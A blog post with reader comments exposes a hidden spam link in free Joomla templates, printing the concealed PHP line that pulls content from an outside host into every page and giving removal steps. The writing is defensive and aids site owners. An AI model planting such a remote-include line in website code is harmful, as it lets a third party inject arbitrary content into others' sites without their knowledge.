Removing hidden online poker link from Joomla template

SPAM links in free Joomla templates

Just to make it clear up front, this article is not about removing author credit links from templates with Creative Commons licenses. Authors do deserve credit for their work and their links should be left intact or adjusted to match site's design.

A friend of mine asked to create a simple website for him. We chose Joomla CMS and Gambling template for Joomla (gameon) from Quality Joomla Templates. Although his site had nothing to do with gambling, we liked template's structure and were going to heavily customize it anyway.

Once website was almost ready we noticed that Google had already indexed it, which was a good thing. What was not so good, Google from somewhere pulled text "Thanks to online poker sites" and was displaying this in site's description.

Quickly checked website's source and surely there was following html:

 
<p>Thanks to <a href="http://onlinepokertool.com" title="online poker sites">online poker sites</a></p>
 

The link was hidden and was not appearing as a visible text anywhere on the website.

I run a text search through all template files and there was no references to poker, gambling or anything similar. It was clear that template's creators (or somebody who modified template afterwards) somehow obfuscated the link so it's difficult to find and remove it. I've seen similar behaviour when authors make it difficult to remove credit footer links, which some may justify some may not. This, though, had nothing to do with legitimate credit. Credit link was at the bottom where it should be, and online gambling thing was a sneaky attempt to conceal a hidden spam link into somebody's website.

A short investigation revealed how this was setup.

How it works

index.php had following code:

 
<?php include "html/com_content/archive/component.php"; ?>
 

This was pulling following from html/com_content/archive/component.php:

 
<!-- Joomla (GNU PGL) is one of the most popular open source CMS in the world(content management systems) --></div></div></div></div><div class="back-top"></div><div id="main-content"><?php $comp=file_get_contents('http://www.pointlink.net/pk.php'); echo $comp; ?>
 

Crucial bit here is

<?php $comp=file_get_contents('http://www.pointlink.net/pk.php'); echo $comp; ?>

 This pulls the link Thanks to online poker sites from pointlink.net/pk.php and outputs it into html output.

This way they avoid placing words online poker anywhere in template's code thus making detection more difficult. More worryingly they can insert pretty much anything in your website's code by changing pointlink.net/pk.php content.

How to remove

Removal is actually pretty simple.

Because component.php contains part of the template's structure code, you can't simply remove
<?php include "html/com_content/archive/component.php"; ?>

from index.php as this would break the template.

Option 1:

  • Open html/com_content/archive/component.php and remove
    <?php $comp=file_get_contents('http://www.pointlink.net/pk.php'); echo $comp; ?>

Option 2:

  • Delete
    <?php include "html/com_content/archive/component.php"; ?>

    from index.php and replace this with
    </div></div></div></div><div class="back-top"></div><div id="main-content">

    (taken from html/com_content/archive/component.php)
  • Then you can completely remove html/com_content/archive/component.php.

 

It seems that the same or similar hidden code appears in some other templates from QualityJoomlaTemplates and FreshJoomlaTemplates. Including Business Template for Joomla (JustBusiness), Elegant (Outsourcing), iFreedom, ecoPlanet and others.

I would suggest avoiding these sites and their templates and find more honest developers, who don't try to sneak-in spam links into your website.

Comments  

harsha
# harsha 2014-05-20 05:46
Google displaces the title of my site as "poker sites online". I remove the line of that file as you have said. But still the title remains the same. Please help..!!
admin
# admin 2014-05-20 09:44
It takes time for Google to update its cache. You can submit your pages manually using Google Webmaster Tools, that should speed things up.
harsha
# harsha 2014-05-20 09:45
Thanx..!!
harsha
# harsha 2014-05-20 05:47
not displaces,it should be "displays".
Mysterious
# Mysterious 2014-02-23 22:31
Haha, I have a nice idea for hidden the link! In templates of QualityJoomlaTe mplates you can change the . You can set size for "0px" and "Tá-dáááá"! :D:D:D
Mysterious
# Mysterious 2014-02-23 22:33
Sorry, in index archive you need search for the link of author, so you go to style and in font-size you change it for 0px.
JM
# JM 2013-10-03 12:35
I had a similar problem when I tried to add new module on my Joomla 2.5 site. My template is JustBusiness-FJ T. I assigned the module a position to the right of the page. An ad link appeared inside the div around the module box.

Assuming it was a link that came with the module,I disabled the module and installed another one. A (different) ad link appears in the same place. Since the same thing has happened in the same position with two different modules, I'm beginning to wonder whether this is something hidden in the template.

Is it possible for the hidden links to only appear if a module is enable in a certain position?

Thanks. Look forward to hearing your thoughts on this.
admin
+1 # admin 2013-10-03 12:59
Quoting JM:

Is it possible for the hidden links to only appear if a module is enable in a certain position?

I'm sure it is. But much more likely that this is unintended behaviour.
JustBusiness-FJ is known to have hidden SPAM links, check your template very carefully.
JM
# JM 2013-10-04 12:02
OK, thanks for all the info.
Filipe
# Filipe 2012-09-25 16:44
Hi, in template ifeedom there is a code

But if i remove it the website will show a message error and template isnt working.. i would like to know how i can remove it and the error..
admin
+1 # admin 2012-09-28 08:57
Hi, there are countless number of ways this can be implemented, so I can't suggest anything without seeing the actual code.
Post a question with code samples to our brand new forum and I'll see if I can help you with this.
Tobias
# Tobias 2012-09-25 02:38
hi, thank you very much for your article. Thanks to you I got rid of the www.onlinepokertool.com link hidden in the justbusinessFJT template.
Greg
+2 # Greg 2012-09-01 16:16
Hi! Great work here, had the same problem with my site. Was just wondering because of 2 external links on my page...really dirty :-(

Newsletter

Subscribe to receive occasional updates on new posts.
Your email will not be used for any other purpose and you can unsubscribe at any time.
Please wait